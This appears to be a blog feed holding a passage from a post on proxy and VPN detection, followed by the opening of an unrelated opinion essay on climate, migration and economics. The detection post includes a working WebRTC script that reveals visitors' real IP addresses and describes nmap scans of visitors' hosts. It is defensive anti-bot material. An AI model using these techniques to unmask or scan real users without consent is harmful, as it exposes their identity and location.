<p>The application level delay is non-negligible: On it's normal routing path, an IP packet only has to pass several extremely high-speed IP-layer industrial routers that are built on top of dedicated purpose hardware for routing. A proxy server such as <a href="https://github.com/3proxy/3proxy">3proxy</a> however usually runs on a off the shelf Linux server and the IP packet has to be passed through the Linux TCP/IP stack all the way up to the user land where the proxy server establishes a new TCP/IP connection with the web server. This takes some milliseconds, at least two RTT's for a new three-way TCP/IP handshake.</p>
<p>Large proxy providers may optimize the geo-latency and they probably have super fast proxy servers, but they still need to glue the two TCP/IP connections together in order to appear to the web server that it's talking directly to the proxy server. This will always cost some time.</p>
<p>There are a lot of things that can dilute the timing measurements: Network congestion, unexpected networking issues on the client side and many other reasons. On the plus side, it's possible to detect those issues with JavaScript as well.</p>
<h2>2. WebRTC Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Check if WebRTC leaks the real IP address</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Yes, obtaining the real IP address via WebRTC requires JavaScript</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>~200 ms after <code>DOMContentLoaded</code></td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p><a href="https://webrtchacks.com/so-your-vpn-is-leaking-because-of-webrtc/">WebRTC for proxy detection</a> is an older technique, but still very relevant. <a href="https://en.wikipedia.org/wiki/WebRTC">WebRTC</a> (Web Real-Time Communication) is a technique that allows direct peer-to-peer communication in browsers over UDP. It is intended to enable direct audio and video communication between peers. </p>
<p>Because direct peer to peer communication is possible, there must be a way to detect the public and internal IP addresses of the peers. This is made possible with a so called <a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Protocols">STUN protocol</a>.</p>
<blockquote>
<p>Session Traversal Utilities for NAT (STUN) (acronym within an acronym) is a protocol to discover your public address and determine any restrictions in your router that would prevent a direct connection with a peer. The client will send a request to a STUN server on the Internet who will reply with the client’s public address and whether or not the client is accessible behind the router’s NAT. (<a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Protocols">Source</a>)</p>
</blockquote>
<p>However, WebRTC in Chrome is unaffected by any proxy configuration. If a browser is configured to use a proxy server (<code>google-chrome --proxy-server="socks5://localhost:1080"</code>), WebRTC does not communicate through this proxy, because WebRTC uses UDP by default and most http/s or socks proxies only support TCP. This standard behavior by Chrome <a href="https://webrtchacks.com/so-your-vpn-is-leaking-because-of-webrtc/">can be fixed</a>.</p>
<p>Without further ado, the html source below will display your IP address as seen by WebRTC:</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!DOCTYPE html></span><span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">"viewport"</span> <span class="na">content</span><span class="o">=</span><span class="s">"width=device-width, initial-scale=1"</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>WebRTC leak<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">var</span> <span class="nx">ips</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">function</span> <span class="nx">findIP</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">myPeerConnection</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">RTCPeerConnection</span> <span class="o">||</span> <span class="nb">window</span><span class="p">.</span><span class="nx">mozRTCPeerConnection</span> <span class="o">||</span> <span class="nb">window</span><span class="p">.</span><span class="nx">webkitRTCPeerConnection</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">pc</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">myPeerConnection</span><span class="p">({</span><span class="nx">iceServers</span><span class="o">:</span> <span class="p">[{</span><span class="nx">urls</span><span class="o">:</span> <span class="s2">"stun:stun.l.google.com:19302"</span><span class="p">}]}),</span>
<span class="nx">noop</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{},</span>
<span class="nx">localIPs</span> <span class="o">=</span> <span class="p">{},</span>
<span class="nx">ipRegex</span> <span class="o">=</span> <span class="sr">/([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g</span><span class="p">,</span>
<span class="nx">key</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">ipIterate</span><span class="p">(</span><span class="nx">ip</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">localIPs</span><span class="p">[</span><span class="nx">ip</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">ips</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">ip</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"webRTCResult"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">ips</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">localIPs</span><span class="p">[</span><span class="nx">ip</span><span class="p">]</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">createDataChannel</span><span class="p">(</span><span class="s2">""</span><span class="p">);</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">createOffer</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">sdp</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">sdp</span><span class="p">.</span><span class="nx">sdp</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="s1">'\n'</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">line</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">line</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="s1">'candidate'</span><span class="p">)</span> <span class="o"><</span> <span class="mf">0</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="nx">line</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">ipIterate</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">setLocalDescription</span><span class="p">(</span><span class="nx">sdp</span><span class="p">,</span> <span class="nx">noop</span><span class="p">,</span> <span class="nx">noop</span><span class="p">);</span>
<span class="p">},</span> <span class="nx">noop</span><span class="p">);</span>
<span class="nx">pc</span><span class="p">.</span><span class="nx">onicecandidate</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">ice</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">ice</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span> <span class="o">||</span> <span class="o">!</span><span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">))</span> <span class="k">return</span><span class="p">;</span>
<span class="nx">ice</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">candidate</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="nx">ipRegex</span><span class="p">).</span><span class="nx">forEach</span><span class="p">(</span><span class="nx">ipIterate</span><span class="p">);</span>
<span class="p">};</span>
<span class="p">}</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">findIP</span><span class="p">();</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">ips</span> <span class="o">=</span> <span class="s1">'WebRTC failed: '</span> <span class="o">+</span> <span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">();</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s2">"webRTCResult"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">ips</span><span class="p">,</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"><</span><span class="nt">h4</span><span class="p">></span>WebRTC Detected IPs<span class="p"></</span><span class="nt">h4</span><span class="p">></span>
<span class="p"><</span><span class="nt">pre</span> <span class="na">id</span><span class="o">=</span><span class="s">"webRTCResult"</span><span class="p">></</span><span class="nt">pre</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>If your IP address obtained with WebRTC differs from the IP address that the browser uses otherwise, it's almost always a sure signal that a proxy server is used. Therefore, this test is very helpful in order to detect (misconfigured) proxy-browser sessions. </p>
<h2>3. TCP/IP Fingerprint Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Compare the OS induced from the TCP/IP fingerprint with the OS advertised by the User-Agent</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Somewhat. The client will need to alter their TCP/IP stack configuration to change their TCP/IP fingerprint. In case of a proxy server, the proxy server needs to dynamically match the TCP/IP stack configuration of the User-Agent it routes the traffic for.</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>Right after the User-Agent header of the first incoming HTTP request reached the server.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p>I created a python module named <a href="https://github.com/NikolaiT/zardaxt">zardaxt.py</a> that uses <code>tcpdump</code> in order to detect the operating system from an incoming SYN packet belonging to a three-way TCP/IP handshake. </p>
<p>Please consult the <a href="https://github.com/NikolaiT/zardaxt">GitHub page</a> if you want to know exactly how this technique works, but to put things shortly: The TCP and IP header fields have different default values on the major operating systems (Linux, Windows, iOS), thus it's possible to infer the operating system by looking at those header fields alone.</p>
<p>This test compares the operating system inferred from the TCP/IP fingerprint with the operating system displayed in the User-Agent or <code>navigator.userAgent</code> property from the browser. If there is a mismatch, there might be a proxy used!</p>
<p>I have to admit that this test is not 100% accurate, I look at it more as <em>one bit</em> of additional information to make an educated guess.</p>
<h2>4. Open Ports Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Check if the host connecting to the web server has open ports or is reachable from the Internet</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Somewhat. Either the client is pingable from the Internet or not. A properly configured iptables can drop any packet that reaches a host that does not belong to a outbound connection.</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>After the <code>nmap</code> portscan or <code>ping</code> probe completed. Maybe 500ms after first SYN packet.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>High</td>
</tr>
</tbody>
</table>
<p>This test is maybe a bit invasive, but it's relatively easy to explain how it works: If I have sufficient grounds to assume that an incoming connection belongs to a proxy, I make an port scan with <code>nmap</code>. Alternatively I can <code>ping</code> the host. If the host is up and reachable from the Internet, it usually is already a sign that it could be a proxy. Most normal Internet users are behind a ISP or carrier grade NAT, thus not allowing incoming connections from the Internet.</p>
<p>If the host has well-known proxy ports open such as <code>3128</code> or <code>1080</code>, it is a hard sign that the host has a proxy server running. </p>
<p>Of course, smart proxy providers will disallow any incoming connections from arbitrary IP ranges, but maybe some magic can be done with <a href="https://nmap.org/book/firewalls.html">nmap firewall and intrusion detection system bypassing</a>.</p>
<p>I consider this test to be only necessary when there is some evidence that the host might be a proxy but I am not entirely sure.</p>
<h2>5. Datacenter IP Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Check if the IP address belongs to a datacenter. Datacenter proxies are often hosted in public datacenters such as AWS or Digitalocean. Those cloud providers publish their IP ranges, which makes it possible to check if a proxy belongs to a datacenter or not.</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>No (if the public IP ranges of the datacenters are to be trusted)</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>Immediately after first incoming SYN packet.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p>Recently, I <a href="https://incolumitas.com/pages/Datacenter-IP-API/">published an API</a> that allows to check whether an IP address belongs to a data center IP address range such as Azure, AWS, Digitalocean, Google Cloud Platform and many other cloud providers. </p>
<p>Those cloud services periodically publish their public IP ranges and if I encounter a connection from such a datacenter IP address, I almost immediately know that this IP address does not belong to a normal Internet user. If the IP address behaves badly, I throttle it fast.</p>
<p>By using services such as <a href="https://ipinfo.io/">ipinfo.io</a>, I can assign a quality ranking to each IP address. An IP address from an ISP such as Deutsche Telekom or Comcast surely is more trustworthy than a IP address belonging to the cloud provider Digitalocean.</p>
<h2>6. DNS Leak Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Check if the DNS server of the client leaks any data. If the client uses a DNS resolver that leaks the IP address of the ISP DNS resolver, it's a mismatch to the proxy IP address.</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Yes, just use a generic DNS resolver such as the one from Google (8.8.8.8) or Cloudflare</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>As soon as the SYN packet arrives on the server and the DNS query reached the DNS server.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p><a href="https://en.wikipedia.org/wiki/DNS_leak">Wikipedia defines</a> a DNS leak as follows:</p>
<blockquote>
<p>A DNS leak refers to a security flaw that allows DNS requests to be revealed to ISP DNS servers, despite the use of a VPN service to attempt to conceal them. Although primarily of concern to VPN users, it is also possible to prevent it for proxy and direct internet users.</p>
</blockquote>
<p>But my test and use case is a bit different: I am not interested in what websites the users are visiting (after all they visit my proxy detection test site), I only want to see if the IP addresses of the DNS servers actually belong to an entity that could reasonably be related to the IP address of the client!</p>
<p>Put differently: If the proxy IP address belongs to a ISP from Vietnam, but the IP addresses from the DNS servers belong to Comcast in North America, it might be an indication that a bot programmer forgot to send their DNS queries through public and generic DNS resolvers such as the public DNS server from Google (8.8.8.8). </p>
<h2>7. HTTP Proxy Headers Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Look for suspicious proxy headers in the HTTP headers</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Yes, just drop any proxy headers on your proxy server</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>Right after the headers of the first incoming HTTP request reached the server.</td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p>Many http proxy servers add additional http headers to each http request. The presence of those headers indicate that a proxy server is used. I consider the following http headers to be evidence that the connection is proxied over an http proxy:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">proxy_headers</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'Forwarded'</span><span class="p">,</span> <span class="s1">'Proxy-Authorization'</span><span class="p">,</span>
<span class="s1">'X-Forwarded-For'</span><span class="p">,</span> <span class="s1">'Proxy-Authenticate'</span><span class="p">,</span>
<span class="s1">'X-Requested-With'</span><span class="p">,</span> <span class="s1">'From'</span><span class="p">,</span>
<span class="s1">'X-Real-Ip'</span><span class="p">,</span> <span class="s1">'Via'</span><span class="p">,</span> <span class="s1">'True-Client-Ip'</span><span class="p">,</span> <span class="s1">'Proxy_Connection'</span><span class="p">];</span>
</code></pre></div>
<p>Of course, those headers can be dropped by <em>anonymous</em> proxy servers, but many providers forget even that.</p>
<h2>Even More Juice</h2>
<p>And there are even more viable test strategies to detect proxies:</p>
<ol>
<li>IP Timezone vs Browser Timezone Test: You can compare the timezone obtained with a IP geolocation API with the browser timezone. If there is a mismatch, it might be because a proxy is used.</li>
<li>Browser Based Port Scanning of the internal network: With <a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">browser based port scanning techniques</a>, it is possible to find out if there is a proxy server listening for connections. TOR for example uses always the port 9050 or 9150, so browser based port scanning might detect TOR usage. Other known ports used for proxys/VPNs are 3128, 8081 and 1080.</li>
<li>Detect a Internet reachable host with <code>ping</code>. Hosts that are not behind a NAT and reachable from the Internet are suspicious. Downside: The network and hosts on the routing path must support ICMP, but ICMP packets are often filtered by firewalls.</li>
<li>Another idea is to frequent public IP spam/ban lists such as the <a href="http://iplists.firehol.org/">fireHOL ipset list</a>. The <a href="https://github.com/firehol/blocklist-ipsets">blocklist-ipsets GitHub repository</a> accumulates IP ban lists from many sources on the Internet! I recently published <a href="https://incolumitas.com/pages/FireHOL-API/">an API</a> to query the blocklist-ipsets fireHOL lists.</li>
</ol>
<h2>Discussion about Proxy/VPN Detection in the Internet</h2>
<p>Discussion on Stackoverflow regarding the question <a href="https://stackoverflow.com/questions/33300877/how-do-you-detect-a-vpn-or-proxy-connection">How do you detect a VPN or Proxy connection?</a></p>
<blockquote>
<p>Frankly, IP-based bans (or actually, any kind of limiting focusing on people who do not exclusively possess their public IP address: proxy servers, VPNs, NAT devices, etc) have been unrealistic for a long time, and as the IPv4 pools have been getting depleted in many parts of the world, ISPs are putting more and more clients behind large NAT pools</p>
</blockquote>
<p>I doubt the above statement frankly said. Most websites and anti bot companies put a lot of emphasis on IP addresses when it comes to bans.</p>
<p>Better discussion on stackoverflow: <a href="https://security.stackexchange.com/questions/71774/how-can-i-detect-a-vpn-connection-even-just-in-some-cases-to-get-the-real-loca">How can I detect a VPN connection (even just in some cases) to get the real location of the user</a></p>
<blockquote>
<p>Finding out that a user is using a VPN service provider isn't that difficult. Most of them have static IP addresses for their exit gateways, so it could just be using a list of known IP addresses to identify VPNs.</p>
</blockquote>
<p>Which is a reasonable strategy. It might hard to keep those lists up to date and to enumerate all VPN exit nodes though.</p>
<blockquote>
<p>And even when they don't have a list, a simple reverse DNS lookup might tell them that the IP has a hostname which is obviously a VPN provider and not one assigned by a normal internet service provider.</p>
</blockquote>
<p>I doubt that VPN providers focused on privacy, have an DNS entry for their exit node IP addresses that identifies their company.</p>
<h4>Detect VPN Usage by decreased MTU/MSS</h4>
<p>A very interesting read: <a href="https://medium.com/@ValdikSS/detecting-vpn-and-its-configuration-and-proxy-users-on-the-server-side-1bcc59742413">Detecting VPN (and its configuration!) and proxy users on the server side</a></p>
<p>Main points from the blog article, <strong>direct citation</strong>:</p>
<blockquote>
<p>As you try to open a web page with PPTP, L2TP(±IPsec) or IPsec IKE connected, your packet is encapsulated into another packet which introduces overhead. Large packets which could be sent without fragmentation without VPN connected now should be fragmented in order to be successfully delivered via your network, which lowers your speed and adds latency. In order to mitigate excessive fragmentation, OS sets lower MTU on the VPN interface then your real network interface MTU, preventing huge packets which would require fragmentation to be created.</p>
<p>To support old or just crappy software, OpenVPN doesn’t decrease interface MTU but decreases MSS inside encapsulated packet. That’s done with the mssfix setting which calculates OpenVPN overhead for the packet encapsulation and encryption and sets MSS accordingly for the packets to flow without any fragmentation. It is configured to work with any link with MTU 1450 or more by default.</p>
<p>Because of this unique MSS values, we can determine not only if the user is connected via OpenVPN , but also used connection protocol (IPv4, IPv6), transport protocol (UDP, TCP), cipher, MAC and compression as they affect MSS.</p>
</blockquote>
<p>I think I will cover VPN detection by deep package inspection and decreased MTU/MSS detection in the next blog post. I am already very exited about this topic!</p>Where is the World headed to?2021-10-03T14:51:00+02:002021-10-06T23:51:00+02:00Nikolai Tschachertag:incolumitas.com,2021-10-03:/2021/10/03/where-is-the-world-headed-to/<p>My personal opinion on economical and sociological topics in the near (2030) and mid-term (2050) future. This essay is divided into the following categories: Climate Crisis, Globalisation & Economy, Geopolitics & War, Advance of Medicine & Technology.</p><p>Important: I am a computer scientist, not an economist or sociologist. So please take everything written here with a grain of salt - as always. Some of the information is based on educated guesses, other statements are wild assumptions. Furthermore, I am sharing my thoughts about society and economy for mainly two reasons:</p>
<ol>
<li>I need to write out my current world view. It might be interesting to myself in the future to look back on my way of thinking back when I was 30 years old. So consider this to be part of my political & economical diary.</li>
<li>Some of my readers or the people I worked with might actually be interested to know how I look at the world. But that's probably the first wild assumption being made here ;)</li>
</ol>
<h2>Introduction</h2>
<p>While I am writing this blog post, I look out of an airplane window. Right after the plane took off, I overlooked a forest close to the airport of Cologne/Bonn with many spots of <a href="https://ethz.ch/de/news-und-veranstaltungen/eth-news/news/2015/08/borkenkaefer-im-klimawandel.html">rotten and dead trees</a>. A couple of minutes later, while the plane is cruising at around 10.000 metres above the ground, it's impossible for me to see a place where humans have not left their mark, where nature has not been touched.</p>
<p>What I observe: Rivers are straightened, forests are cut down, huge cities are everywhere and there is not a single spot without human intervention. Granted, I am flying above Western Europe and the sight might be completely different compared to the vast wilderness of Siberia (Namely, I'd see endless <a href="https://www.greenpeace.org/international/story/49171/russia-record-breaking-fires-siberia/">forest fires</a>).</p>
<p>The point I try to make is that human progress and the advance of civilization on our planet imposes a huge amount of stress on the natural environment.</p>
<p>Resources such as living space, food, water and energy are scarce, meanwhile the human population is growing. Of course, the growth rate has decreased and projections assume the human population to be ceiling at the end of the 21st century at around <a href="https://www.pewresearch.org/fact-tank/2019/06/17/worlds-population-is-projected-to-nearly-stop-growing-by-the-end-of-the-century/">10.9 billion people</a>.</p>
<p>Nevertheless, the human greed to own more and more material goods is not going to stop anytime soon. On the contrary, every damn person on this planet wants a car, a house and three vacations by airplane every year. There are roughly 1 billion people from the rich first world that are used to this lifestyle. But at the same time, the first world is deeply afraid of what happens when the other 7 billion catch up (Ignoring the fact, that this race is already in full progress).</p>
<p>In this blog post, I try to sketch what problems the earth has to overcome in the next 30, 50 and 100 years. While I am fully aware that it is notoriously difficult to make long term projections, I try to give it a naive go here.</p>
<p>In order to have some structure, I divide my essay into the following four sections:</p>
<ol>
<li>Climate Crisis</li>
<li>Globalisation & Economy</li>
<li>Geopolitics & War</li>
<li>Advance of Medicine & Technology</li>
</ol>
<h2>Climate Crisis</h2>
<p>It's relatively easy to proof that there is more CO2 in the atmosphere due to human influence . CO2 atoms that originate from fossil fuels (and thus the ground) are <a href="https://royalsociety.org/topics-policy/projects/climate-change-evidence-causes/basics-of-climate-change/">depleted in natural radioactive Carbon-14</a>, because the half-life is with roughly 5730 years relatively low. Put differently, if we measure the amount of CO2 molecules in the atmosphere without a radioactive Carbon-14 atom, we can observe the effect of human produced fossil fuel emissions.</p>
<p>The question whether this increase in carbon-dioxide and methane emissions also causes the climate crisis, is harder to answer. But even if the climate change theory is just a theory and we give the deniers the benefit of doubt (after all, it's hard to prove that the climate crisis is fully man-made), it's an undeniable fact that the earth is heating up at an alarming pace.</p>
<figure>
<img src="https://incolumitas.com/images/agreement_gis_2019.gif" alt="climateChangeTemp" />
<figcaption>The Earth is heating up
<span style="font-size: 60%">(Source: <a href="https://earthobservatory.nasa.gov/world-of-change/global-temperatures">https://earthobservatory.nasa.gov/world-of-change/global-temperatures</a>)</span>
</figcaption>
</figure>
<p>This increase in temperature causes a myriad of primary problems:</p>
<ol>
<li>Heat waves and the suffering of humans under heat domes and subsequent wild fires</li>
<li>The melting of glaciers and the ice on the north pole and Antarctic</li>
<li>Huge wildfires such as the ones <a href="https://en.wikipedia.org/wiki/2021_Russia_wildfires">from 2021 in Russia/Siberia</a> which in turn increase the emission of CO2</li>
<li>Other extreme weather events such as floods, hurricanes, storms, ...</li>
<li>The increase of the sea level and the endangerment of countries whose territories are close to the sea level</li>
</ol>
<p>The past has shown that many countries on the planet have very little means to protect their population from climate disasters. Most recently, tropical storms and earthquakes (Earthquakes are no consequence of climate-change of course) in Haiti caused <a href="https://www.theguardian.com/global-development/2021/sep/18/haiti-migrants-us-texas-violence">many thousand climate refugees</a> that are headed to the US border, even though the US under the Biden administration is reluctant to allow any refugee to enter the country.</p>
<p>Projections show that we have to expect millions of climate refugees from the southern hemisphere pushing into northern countries. On Sept. 13, 2021, the <a href="https://www.worldbank.org/en/news/press-release/2021/09/13/climate-change-could-force-216-million-people-to-migrate-within-their-own-countries-by-2050">updated Groundswell report from the Worldbank</a> predicts that up to 216 million people across six world regions are forced to move due to climate change within their countries. The report states that <em>by 2050, Sub-Saharan Africa could see as many as 86 million internal climate migrants; East Asia and the Pacific, 49 million; South Asia, 40 million; North Africa, 19 million; Latin America, 17 million; and Eastern Europe and Central Asia, 5 million.</em> </p>
<p>As a German, I can say that the Syrian Civil war (Surely not caused by climate change) and migration due to other reasons that lead to the arrival of <a href="https://de.wikipedia.org/wiki/Liste_der_L%C3%A4nder_nach_gefl%C3%BCchteter_Bev%C3%B6lkerung#L%C3%A4nder_nach_Bestand_an_internationalen_Fl%C3%BCchtlingen">1.5 million</a> refugees in Germany almost tore the German society apart. As a result, the far right political party AFD emerged and to this day has widespread support in the German society. (12.5% and 10% of all Germans voted for them in 2017 and 2021). It's relatively safe to say that Germany will not overcome another major refugee movement (major = More than 2 million refugees) without civil-war-like violent outbursts.</p>
<p>The same applies to many other <em>rich</em> European countries. Most European societies are very fragile and the relatively high prosperity is standing on thin legs. We can already see a fortification of the European coastlines and refugee streams are already used politically by countries such as Turkey. To be fair, Turkey took with <a href="https://de.wikipedia.org/wiki/Liste_der_L%C3%A4nder_nach_gefl%C3%BCchteter_Bev%C3%B6lkerung#L%C3%A4nder_nach_Bestand_an_internationalen_Fl%C3%BCchtlingen">4 million refugees</a> the majority of Syrian migrants and the political pressure against Europe is somewhat understandable in this context.</p>
<p>The question begs to be answered: If the collapse of a relatively small nation such as Syria causes so much trouble in the refugee-absorbing nations such as Turkey and Germany, what will happen if entire geographical regions become gradually more inhabitable? Of course this will be a slow and continuous process over the next 50 years, but we can already observe it in certain parts of the world:</p>
<ol>
<li>
<p>The recent heat wave in Summer 2021 and in 2020 on the North American West-Coast and the lack of water supply motivated already quite some people to pack up and leave elsewhere (Montana for example). The New York Times <a href="https://www.nytimes.com/interactive/2020/09/15/magazine/climate-crisis-migration-america.html">wrote about this anticipated refugee waves in the US</a> last year and predicts <em>that 13 million Americans will be forced to move away from submerged coastlines. Add to that the people contending with wildfires and other risks, and the number of Americans who might move — though difficult to predict precisely — could easily be tens of millions larger.</em></p>
</li>
<li>
<p>In the Sahel zone, the <a href="https://www.worldbank.org/en/news/immersive-story/2020/09/21/where-climate-change-is-reality-supporting-africas-sahel-pastoralists-secure-a-resilient-future">rainy seasons are growing shorter and the dry seasons are getting longer</a>. In 2010, a draught was particularly arduous. It is estimated to have killed more than 4.8 million head of cattle In Niger, roughly 25% of the herd.</p>
</li>
<li>
<p>Climate change in the Caribbean poses a major threat to the islands in the Caribbean. The largest environmental changes are the rise in sea level, stronger hurricanes, longer dry seasons and shorter wet seasons. <a href="https://www.cbsnews.com/news/climate-change-may-make-extreme-hurricane-rainfall-five-times-more-likely-study-says/">Studies said</a> that climate change may make extreme hurricane rainfall 5 times more likely.</p>
</li>
</ol>
<p>It has to be mentioned that it's scientifically not accurate to state that people flee only because of climate change reasons. It's often a complicated mix of socio-economic factors. Natural disasters might be only the icing of the cake. For example, the natural environment of the Gulf nations would be an impossible living environment for a economically weaker civilisation that depends on agriculture and low-level manufacturing.</p>
<p>But it poses no risk to the extremely rich Gulf nations that only export crude oil and oil products and import everything else, including their work-force. But still, it's utter ecological <a href="https://www.youtube.com/watch?v=tJuqe6sre2I">madness to create cities such as Dubai</a> in such inhospitable regions.</p>
<h2>Globalisation & Economy</h2>
<p>We are close to the year 2022 and it's safe to say that our world is thoroughly globalized. Maybe the COVID-19 pandemic reduced the acceleration of the Globalisation, but in the big picture, you can barely see the COVID-19 pandemic dent in the upwards trend.</p>
<p>I think it's fair to say that it doesn't really matter where your live on this planet if you earn enough money (maybe enough money constitutes an income > 50.000 EUR). You surely need to exclude both tails of the world's countries - the poorest and richest - because that amount of money will get you nowhere in New York and you most likely don't want to live in Somalia either. But everywhere else, in totally average countries such as Bulgaria, Malaysia, Argentina or Germany, you will be set with that income.</p>
<p>You can have a decent life in a gated community in the Democratic Republic of Congo if you earn 50.000 EUR/year and you can have a shitty life in Germany if you earn 20.000 EUR/year. Of course, Germany might save you from starvation and becoming homeless and the Democratic Republic of Congo won't (I am guessing), but my general point still stands: It mostly doesn't matter where you live on this planet, it only matters how much money you make.</p>
<p>So how does the future economy and work force look like?</p>
<p>I am convinced that inequality will become even greater in the future. If you come from nothing, It's extremely hard to find a good and high-income job that allows you to build basic wealth. And by basic wealth, I mean the ability to own a decent house and a decent car and the ability to support your family. On the other hand, if you are already wealthy, it's easy to maintain your wealth.</p>
